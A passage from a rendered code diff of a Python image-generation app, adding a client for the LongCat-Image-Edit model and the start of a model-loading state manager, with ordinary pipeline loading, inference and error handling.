| 207 |
+
|
| 208 |
+
except Exception as e:
|
| 209 |
+
logger.error(f"Failed to decode image: {e}")
|
| 210 |
+
return GenerationResult.error_result(
|
| 211 |
+
f"Image decoding error: {str(e)}"
|
| 212 |
+
)
|
| 213 |
+
|
| 214 |
+
return GenerationResult.error_result("No image data in response")
|
| 215 |
+
|
| 216 |
+
def is_healthy(self) -> bool:
|
| 217 |
+
"""Check if API is accessible."""
|
| 218 |
+
return self.api_key is not None and len(self.api_key) > 0
|
| 219 |
+
|
| 220 |
+
@classmethod
|
| 221 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 222 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 223 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 224 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/longcat_edit_client.py
ADDED
|
@@ -0,0 +1,301 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
LongCat-Image-Edit Client
|
| 3 |
+
=========================
|
| 4 |
+
|
| 5 |
+
Client for Meituan's LongCat-Image-Edit model.
|
| 6 |
+
Supports instruction-following image editing with bilingual (Chinese-English) support.
|
| 7 |
+
|
| 8 |
+
This is a SOTA open-source image editing model with excellent:
|
| 9 |
+
- Global editing, local editing, text modification
|
| 10 |
+
- Reference-guided editing
|
| 11 |
+
- Consistency preservation (layout, texture, color tone, identity)
|
| 12 |
+
- Multi-turn editing capabilities
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import logging
|
| 16 |
+
import time
|
| 17 |
+
from typing import Optional, List
|
| 18 |
+
from PIL import Image
|
| 19 |
+
|
| 20 |
+
import torch
|
| 21 |
+
|
| 22 |
+
from .models import GenerationRequest, GenerationResult
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
logger = logging.getLogger(__name__)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
class LongCatEditClient:
|
| 29 |
+
"""
|
| 30 |
+
Client for LongCat-Image-Edit model from Meituan.
|
| 31 |
+
|
| 32 |
+
Features:
|
| 33 |
+
- Instruction-following image editing
|
| 34 |
+
- Bilingual support (Chinese-English)
|
| 35 |
+
- Excellent consistency preservation
|
| 36 |
+
- Multi-turn editing
|
| 37 |
+
|
| 38 |
+
Requires ~18GB VRAM with CPU offload.
|
| 39 |
+
"""
|
| 40 |
+
|
| 41 |
+
MODEL_ID = "meituan-longcat/LongCat-Image-Edit"
|
| 42 |
+
|
| 43 |
+
# Aspect ratio to dimensions mapping
|
| 44 |
+
ASPECT_RATIOS = {
|
| 45 |
+
"1:1": (1024, 1024),
|
| 46 |
+
"16:9": (1344, 768),
|
| 47 |
+
"9:16": (768, 1344),
|
| 48 |
+
"21:9": (1536, 640), # Cinematic ultra-wide
|
| 49 |
+
"3:2": (1248, 832),
|
| 50 |
+
"2:3": (832, 1248),
|
| 51 |
+
"3:4": (896, 1152),
|
| 52 |
+
"4:3": (1152, 896),
|
| 53 |
+
"4:5": (896, 1120),
|
| 54 |
+
"5:4": (1120, 896),
|
| 55 |
+
}
|
| 56 |
+
|
| 57 |
+
# Default generation settings
|
| 58 |
+
DEFAULT_STEPS = 50
|
| 59 |
+
DEFAULT_GUIDANCE = 4.5
|
| 60 |
+
|
| 61 |
+
def __init__(
|
| 62 |
+
self,
|
| 63 |
+
device: str = "cuda",
|
| 64 |
+
dtype: torch.dtype = torch.bfloat16,
|
| 65 |
+
enable_cpu_offload: bool = True,
|
| 66 |
+
):
|
| 67 |
+
"""
|
| 68 |
+
Initialize LongCat-Image-Edit client.
|
| 69 |
+
|
| 70 |
+
Args:
|
| 71 |
+
device: Device to use (cuda or cpu)
|
| 72 |
+
dtype: Data type for model weights (bfloat16 recommended)
|
| 73 |
+
enable_cpu_offload: Enable CPU offload to save VRAM (~18GB required)
|
| 74 |
+
"""
|
| 75 |
+
self.device = device
|
| 76 |
+
self.dtype = dtype
|
| 77 |
+
self.enable_cpu_offload = enable_cpu_offload
|
| 78 |
+
self.pipe = None
|
| 79 |
+
self._loaded = False
|
| 80 |
+
|
| 81 |
+
logger.info(f"LongCatEditClient initialized (cpu_offload: {enable_cpu_offload})")
|
| 82 |
+
|
| 83 |
+
def load_model(self) -> bool:
|
| 84 |
+
"""Load the model into memory."""
|
| 85 |
+
if self._loaded:
|
| 86 |
+
return True
|
| 87 |
+
|
| 88 |
+
try:
|
| 89 |
+
logger.info(f"Loading LongCat-Image-Edit from {self.MODEL_ID}...")
|
| 90 |
+
|
| 91 |
+
start_time = time.time()
|
| 92 |
+
|
| 93 |
+
# Import LongCat pipeline
|
| 94 |
+
# Requires latest diffusers: pip install git+https://github.com/huggingface/diffusers
|
| 95 |
+
from diffusers import LongCatImageEditPipeline
|
| 96 |
+
|
| 97 |
+
self.pipe = LongCatImageEditPipeline.from_pretrained(
|
| 98 |
+
self.MODEL_ID,
|
| 99 |
+
torch_dtype=self.dtype,
|
| 100 |
+
)
|
| 101 |
+
|
| 102 |
+
# Apply memory optimization
|
| 103 |
+
if self.enable_cpu_offload:
|
| 104 |
+
self.pipe.enable_model_cpu_offload()
|
| 105 |
+
logger.info("CPU offload enabled (~18GB VRAM)")
|
| 106 |
+
else:
|
| 107 |
+
self.pipe.to(self.device, self.dtype)
|
| 108 |
+
logger.info(f"Model moved to {self.device} (high VRAM mode)")
|
| 109 |
+
|
| 110 |
+
load_time = time.time() - start_time
|
| 111 |
+
logger.info(f"LongCat-Image-Edit loaded in {load_time:.1f}s")
|
| 112 |
+
|
| 113 |
+
self._loaded = True
|
| 114 |
+
return True
|
| 115 |
+
|
| 116 |
+
except Exception as e:
|
| 117 |
+
logger.error(f"Failed to load LongCat-Image-Edit: {e}", exc_info=True)
|
| 118 |
+
return False
|
| 119 |
+
|
| 120 |
+
def unload_model(self):
|
| 121 |
+
"""Unload model from memory."""
|
| 122 |
+
if self.pipe is not None:
|
| 123 |
+
del self.pipe
|
| 124 |
+
self.pipe = None
|
| 125 |
+
|
| 126 |
+
self._loaded = False
|
| 127 |
+
|
| 128 |
+
if torch.cuda.is_available():
|
| 129 |
+
torch.cuda.empty_cache()
|
| 130 |
+
|
| 131 |
+
logger.info("LongCat-Image-Edit unloaded")
|
| 132 |
+
|
| 133 |
+
def generate(
|
| 134 |
+
self,
|
| 135 |
+
request: GenerationRequest,
|
| 136 |
+
num_inference_steps: int = None,
|
| 137 |
+
guidance_scale: float = None
|
| 138 |
+
) -> GenerationResult:
|
| 139 |
+
"""
|
| 140 |
+
Edit image using LongCat-Image-Edit.
|
| 141 |
+
|
| 142 |
+
Args:
|
| 143 |
+
request: GenerationRequest object with:
|
| 144 |
+
- prompt: The editing instruction (e.g., "Change the background to a forest")
|
| 145 |
+
- input_images: List with the source image to edit
|
| 146 |
+
- aspect_ratio: Output aspect ratio
|
| 147 |
+
num_inference_steps: Number of denoising steps (default: 50)
|
| 148 |
+
guidance_scale: Classifier-free guidance scale (default: 4.5)
|
| 149 |
+
|
| 150 |
+
Returns:
|
| 151 |
+
GenerationResult object
|
| 152 |
+
"""
|
| 153 |
+
if not self._loaded:
|
| 154 |
+
if not self.load_model():
|
| 155 |
+
return GenerationResult.error_result("Failed to load LongCat-Image-Edit model")
|
| 156 |
+
|
| 157 |
+
# Use defaults if not specified
|
| 158 |
+
if num_inference_steps is None:
|
| 159 |
+
num_inference_steps = self.DEFAULT_STEPS
|
| 160 |
+
if guidance_scale is None:
|
| 161 |
+
guidance_scale = self.DEFAULT_GUIDANCE
|
| 162 |
+
|
| 163 |
+
try:
|
| 164 |
+
start_time = time.time()
|
| 165 |
+
|
| 166 |
+
# Get input image
|
| 167 |
+
if not request.has_input_images:
|
| 168 |
+
return GenerationResult.error_result("LongCat-Image-Edit requires an input image to edit")
|
| 169 |
+
|
| 170 |
+
input_image = None
|
| 171 |
+
for img in request.input_images:
|
| 172 |
+
if img is not None:
|
| 173 |
+
input_image = img
|
| 174 |
+
break
|
| 175 |
+
|
| 176 |
+
if input_image is None:
|
| 177 |
+
return GenerationResult.error_result("No valid input image provided")
|
| 178 |
+
|
| 179 |
+
# Get dimensions from aspect ratio
|
| 180 |
+
width, height = self._get_dimensions(request.aspect_ratio)
|
| 181 |
+
|
| 182 |
+
# Resize input image to target dimensions
|
| 183 |
+
input_image = input_image.convert('RGB')
|
| 184 |
+
input_image = input_image.resize((width, height), Image.Resampling.LANCZOS)
|
| 185 |
+
|
| 186 |
+
logger.info(f"Editing with LongCat: steps={num_inference_steps}, guidance={guidance_scale}")
|
| 187 |
+
logger.info(f"Edit instruction: {request.prompt[:100]}...")
|
| 188 |
+
|
| 189 |
+
# Build generation kwargs
|
| 190 |
+
gen_kwargs = {
|
| 191 |
+
"image": input_image,
|
| 192 |
+
"prompt": request.prompt,
|
| 193 |
+
"negative_prompt": request.negative_prompt or "",
|
| 194 |
+
"guidance_scale": guidance_scale,
|
| 195 |
+
"num_inference_steps": num_inference_steps,
|
| 196 |
+
"num_images_per_prompt": 1,
|
| 197 |
+
"generator": torch.Generator("cpu").manual_seed(42),
|
| 198 |
+
}
|
| 199 |
+
|
| 200 |
+
# Generate
|
| 201 |
+
with torch.inference_mode():
|
| 202 |
+
output = self.pipe(**gen_kwargs)
|
| 203 |
+
image = output.images[0]
|
| 204 |
+
|
| 205 |
+
generation_time = time.time() - start_time
|
| 206 |
+
logger.info(f"Edited in {generation_time:.2f}s: {image.size}")
|
| 207 |
+
|
| 208 |
+
return GenerationResult.success_result(
|
| 209 |
+
image=image,
|
| 210 |
+
message=f"Edited with LongCat-Image-Edit in {generation_time:.2f}s",
|
| 211 |
+
generation_time=generation_time
|
| 212 |
+
)
|
| 213 |
+
|
| 214 |
+
except Exception as e:
|
| 215 |
+
logger.error(f"LongCat-Image-Edit generation failed: {e}", exc_info=True)
|
| 216 |
+
return GenerationResult.error_result(f"LongCat-Image-Edit error: {str(e)}")
|
| 217 |
+
|
| 218 |
+
def edit_with_instruction(
|
| 219 |
+
self,
|
| 220 |
+
source_image: Image.Image,
|
| 221 |
+
instruction: str,
|
| 222 |
+
negative_prompt: str = "",
|
| 223 |
+
num_inference_steps: int = None,
|
| 224 |
+
guidance_scale: float = None,
|
| 225 |
+
seed: int = 42
|
| 226 |
+
) -> GenerationResult:
|
| 227 |
+
"""
|
| 228 |
+
Simplified method for instruction-based image editing.
|
| 229 |
+
|
| 230 |
+
Args:
|
| 231 |
+
source_image: The image to edit
|
| 232 |
+
instruction: Natural language editing instruction
|
| 233 |
+
Examples:
|
| 234 |
+
- "Change the background to a sunset beach"
|
| 235 |
+
- "Make the person wear a red dress"
|
| 236 |
+
- "Add snow to the scene"
|
| 237 |
+
- "Change the cat to a dog"
|
| 238 |
+
negative_prompt: What to avoid in the output
|
| 239 |
+
num_inference_steps: Denoising steps (default: 50)
|
| 240 |
+
guidance_scale: CFG scale (default: 4.5)
|
| 241 |
+
seed: Random seed for reproducibility
|
| 242 |
+
|
| 243 |
+
Returns:
|
| 244 |
+
GenerationResult with the edited image
|
| 245 |
+
"""
|
| 246 |
+
if not self._loaded:
|
| 247 |
+
if not self.load_model():
|
| 248 |
+
return GenerationResult.error_result("Failed to load LongCat-Image-Edit model")
|
| 249 |
+
|
| 250 |
+
if num_inference_steps is None:
|
| 251 |
+
num_inference_steps = self.DEFAULT_STEPS
|
| 252 |
+
if guidance_scale is None:
|
| 253 |
+
guidance_scale = self.DEFAULT_GUIDANCE
|
| 254 |
+
|
| 255 |
+
try:
|
| 256 |
+
start_time = time.time()
|
| 257 |
+
|
| 258 |
+
# Ensure RGB
|
| 259 |
+
source_image = source_image.convert('RGB')
|
| 260 |
+
|
| 261 |
+
logger.info(f"Editing image with instruction: {instruction[:100]}...")
|
| 262 |
+
|
| 263 |
+
with torch.inference_mode():
|
| 264 |
+
output = self.pipe(
|
| 265 |
+
image=source_image,
|
| 266 |
+
prompt=instruction,
|
| 267 |
+
negative_prompt=negative_prompt,
|
| 268 |
+
guidance_scale=guidance_scale,
|
| 269 |
+
num_inference_steps=num_inference_steps,
|
| 270 |
+
num_images_per_prompt=1,
|
| 271 |
+
generator=torch.Generator("cpu").manual_seed(seed),
|
| 272 |
+
)
|
| 273 |
+
image = output.images[0]
|
| 274 |
+
|
| 275 |
+
generation_time = time.time() - start_time
|
| 276 |
+
logger.info(f"Edit completed in {generation_time:.2f}s")
|
| 277 |
+
|
| 278 |
+
return GenerationResult.success_result(
|
| 279 |
+
image=image,
|
| 280 |
+
message=f"Edited with instruction in {generation_time:.2f}s",
|
| 281 |
+
generation_time=generation_time
|
| 282 |
+
)
|
| 283 |
+
|
| 284 |
+
except Exception as e:
|
| 285 |
+
logger.error(f"Instruction-based edit failed: {e}", exc_info=True)
|
| 286 |
+
return GenerationResult.error_result(f"Edit error: {str(e)}")
|
| 287 |
+
|
| 288 |
+
def _get_dimensions(self, aspect_ratio: str) -> tuple:
|
| 289 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 290 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 291 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 292 |
+
|
| 293 |
+
def is_healthy(self) -> bool:
|
| 294 |
+
"""Check if model is loaded and ready."""
|
| 295 |
+
return self._loaded and self.pipe is not None
|
| 296 |
+
|
| 297 |
+
@classmethod
|
| 298 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 299 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 300 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 301 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/model_manager.py
ADDED
|
@@ -0,0 +1,332 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Model Manager
|
| 3 |
+
=============
|
| 4 |
+
|
| 5 |
+
Manages model loading states and provides a robust interface for
|
| 6 |
+
ensuring models are loaded and validated before generation.
|
| 7 |
+
|
| 8 |
+
States:
|
| 9 |
+
- UNLOADED: No model loaded
|
| 10 |
+
- LOADING: Model is being loaded
|
| 11 |
+
- READY: Model loaded and validated
|
| 12 |
+
- ERROR: Model failed to load
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import logging
|
| 16 |
+
import threading
|
| 17 |
+
import time
|
| 18 |
+
from typing import Optional, Callable, Tuple
|
| 19 |
+
from enum import Enum
|
| 20 |
+
from PIL import Image
|
| 21 |
+
|
| 22 |
+
from .backend_router import BackendRouter, BackendType
|
| 23 |
+
from .character_service import CharacterSheetService
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
logger = logging.getLogger(__name__)
|
| 27 |
+
|
| 28 |
+
|
| 29 |
+
class ModelState(Enum):
|
| 30 |
+
"""Model loading states."""
|
| 31 |
+
UNLOADED = "unloaded"
|
| 32 |
+
LOADING = "loading"
|
| 33 |
+
READY = "ready"
|
| 34 |
+
ERROR = "error"
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
class ModelManager:
|
| 38 |
+
"""
|
| 39 |
+
Manages model loading lifecycle with state tracking.
|
| 40 |
+
|
| 41 |
+
Ensures models are fully loaded and validated before allowing generation.
|
| 42 |
+
Provides progress callbacks for UI updates during loading.
|
| 43 |
+
"""
|
| 44 |
+
|
| 45 |
+
def __init__(self):
|
| 46 |
+
self._state = ModelState.UNLOADED
|
| 47 |
+
self._current_backend: Optional[BackendType] = None
|
| 48 |
+
self._service: Optional[CharacterSheetService] = None
|
| 49 |
+
self._error_message: Optional[str] = None
|
| 50 |
+
self._loading_progress: float = 0.0
|
| 51 |
+
self._loading_message: str = ""
|
| 52 |
+
self._lock = threading.Lock()
|
| 53 |
+
self._cancel_requested = False
|
| 54 |
+
|
| 55 |
+
@property
|
| 56 |
+
def state(self) -> ModelState:
|
| 57 |
+
"""Current model state."""
|
| 58 |
+
return self._state
|
| 59 |
+
|
| 60 |
+
@property
|
| 61 |
+
def is_ready(self) -> bool:
|
| 62 |
+
"""Check if model is ready for generation."""
|
| 63 |
+
return self._state == ModelState.READY
|
| 64 |
+
|
| 65 |
+
@property
|
| 66 |
+
def is_loading(self) -> bool:
|
| 67 |
+
"""Check if model is currently loading."""
|
| 68 |
+
return self._state == ModelState.LOADING
|
| 69 |
+
|
| 70 |
+
@property
|
| 71 |
+
def error_message(self) -> Optional[str]:
|
| 72 |
+
"""Get error message if in error state."""
|
| 73 |
+
return self._error_message
|
| 74 |
+
|
| 75 |
+
@property
|
| 76 |
+
def loading_progress(self) -> float:
|
| 77 |
+
"""Get loading progress (0.0 to 1.0)."""
|
| 78 |
+
return self._loading_progress
|
| 79 |
+
|
| 80 |
+
@property
|
| 81 |
+
def loading_message(self) -> str:
|
| 82 |
+
"""Get current loading status message."""
|
| 83 |
+
return self._loading_message
|
| 84 |
+
|
| 85 |
+
@property
|
| 86 |
+
def current_backend(self) -> Optional[BackendType]:
|
| 87 |
+
"""Get currently loaded backend."""
|
| 88 |
+
return self._current_backend
|
| 89 |
+
|
| 90 |
+
@property
|
| 91 |
+
def service(self) -> Optional[CharacterSheetService]:
|
| 92 |
+
"""Get the character sheet service (only valid when ready)."""
|
| 93 |
+
if self._state != ModelState.READY:
|
| 94 |
+
return None
|
| 95 |
+
return self._service
|
| 96 |
+
|
| 97 |
+
def get_status_display(self) -> Tuple[str, str]:
|
| 98 |
+
"""
|
| 99 |
+
Get status message and color for UI display.
|
| 100 |
+
|
| 101 |
+
Returns:
|
| 102 |
+
Tuple of (message, color) where color is a CSS color string
|
| 103 |
+
"""
|
| 104 |
+
if self._state == ModelState.UNLOADED:
|
| 105 |
+
return "No model loaded", "#888888"
|
| 106 |
+
elif self._state == ModelState.LOADING:
|
| 107 |
+
pct = int(self._loading_progress * 100)
|
| 108 |
+
return f"Loading... {pct}% - {self._loading_message}", "#FFA500"
|
| 109 |
+
elif self._state == ModelState.READY:
|
| 110 |
+
backend_name = BackendRouter.BACKEND_NAMES.get(
|
| 111 |
+
self._current_backend,
|
| 112 |
+
str(self._current_backend)
|
| 113 |
+
)
|
| 114 |
+
return f"Ready: {backend_name}", "#00AA00"
|
| 115 |
+
elif self._state == ModelState.ERROR:
|
| 116 |
+
return f"Error: {self._error_message}", "#FF0000"
|
| 117 |
+
return "Unknown state", "#888888"
|
| 118 |
+
|
| 119 |
+
def request_cancel(self):
|
| 120 |
+
"""Request cancellation of current loading operation."""
|
| 121 |
+
self._cancel_requested = True
|
| 122 |
+
logger.info("Model loading cancellation requested")
|
| 123 |
+
|
| 124 |
+
def load_model(
|
| 125 |
+
self,
|
| 126 |
+
backend: BackendType,
|
| 127 |
+
api_key: Optional[str] = None,
|
| 128 |
+
steps: int = 4,
|
| 129 |
+
guidance: float = 1.0,
|
| 130 |
+
progress_callback: Optional[Callable[[float, str], None]] = None
|
| 131 |
+
) -> bool:
|
| 132 |
+
"""
|
| 133 |
+
Load a model with progress tracking.
|
| 134 |
+
|
| 135 |
+
Args:
|
| 136 |
+
backend: Backend type to load
|
| 137 |
+
api_key: API key for cloud backends
|
| 138 |
+
steps: Default steps for generation
|
| 139 |
+
guidance: Default guidance scale
|
| 140 |
+
progress_callback: Callback for progress updates (progress, message)
|
| 141 |
+
|
| 142 |
+
Returns:
|
| 143 |
+
True if model loaded successfully
|
| 144 |
+
"""
|
| 145 |
+
with self._lock:
|
| 146 |
+
if self._state == ModelState.LOADING:
|
| 147 |
+
logger.warning("Model is already loading, ignoring request")
|
| 148 |
+
return False
|
| 149 |
+
|
| 150 |
+
self._state = ModelState.LOADING
|
| 151 |
+
self._loading_progress = 0.0
|
| 152 |
+
self._loading_message = "Initializing..."
|
| 153 |
+
self._error_message = None
|
| 154 |
+
self._cancel_requested = False
|
| 155 |
+
|
| 156 |
+
def update_progress(progress: float, message: str):
|
| 157 |
+
self._loading_progress = progress
|
| 158 |
+
self._loading_message = message
|
| 159 |
+
if progress_callback:
|
| 160 |
+
progress_callback(progress, message)
|
| 161 |
+
|
| 162 |
+
try:
|
| 163 |
+
# Step 1: Unload previous model if different backend
|
| 164 |
+
update_progress(0.05, "Checking current model...")
|
| 165 |
+
|
| 166 |
+
if self._service and self._current_backend != backend:
|
| 167 |
+
update_progress(0.1, "Unloading previous model...")
|
| 168 |
+
try:
|
| 169 |
+
if hasattr(self._service, 'router'):
|
| 170 |
+
self._service.router.unload_local_models()
|
| 171 |
+
except Exception as e:
|
| 172 |
+
logger.warning(f"Error unloading previous model: {e}")
|
| 173 |
+
self._service = None
|
| 174 |
+
|
| 175 |
+
if self._cancel_requested:
|
| 176 |
+
self._state = ModelState.UNLOADED
|
| 177 |
+
return False
|
| 178 |
+
|
| 179 |
+
# Step 2: Create service and load model
|
| 180 |
+
backend_name = BackendRouter.BACKEND_NAMES.get(backend, str(backend))
|
| 181 |
+
update_progress(0.15, f"Loading {backend_name}...")
|
| 182 |
+
|
| 183 |
+
logger.info(f"Creating CharacterSheetService for {backend.value}")
|
| 184 |
+
|
| 185 |
+
# For local models, this will load the model
|
| 186 |
+
# For cloud backends, this just validates the API key
|
| 187 |
+
self._service = CharacterSheetService(
|
| 188 |
+
api_key=api_key,
|
| 189 |
+
backend=backend
|
| 190 |
+
)
|
| 191 |
+
|
| 192 |
+
if self._cancel_requested:
|
| 193 |
+
self._state = ModelState.UNLOADED
|
| 194 |
+
self._service = None
|
| 195 |
+
return False
|
| 196 |
+
|
| 197 |
+
update_progress(0.7, "Model loaded, configuring...")
|
| 198 |
+
|
| 199 |
+
# Step 3: Configure default parameters
|
| 200 |
+
if hasattr(self._service.client, 'default_steps'):
|
| 201 |
+
self._service.client.default_steps = steps
|
| 202 |
+
if hasattr(self._service.client, 'default_guidance'):
|
| 203 |
+
self._service.client.default_guidance = guidance
|
| 204 |
+
|
| 205 |
+
update_progress(0.8, "Validating model...")
|
| 206 |
+
|
| 207 |
+
# Step 4: Validate model is actually working
|
| 208 |
+
is_valid, error = self._validate_model()
|
| 209 |
+
|
| 210 |
+
if not is_valid:
|
| 211 |
+
raise RuntimeError(f"Model validation failed: {error}")
|
| 212 |
+
|
| 213 |
+
update_progress(1.0, "Ready!")
|
| 214 |
+
|
| 215 |
+
# Success!
|
| 216 |
+
with self._lock:
|
| 217 |
+
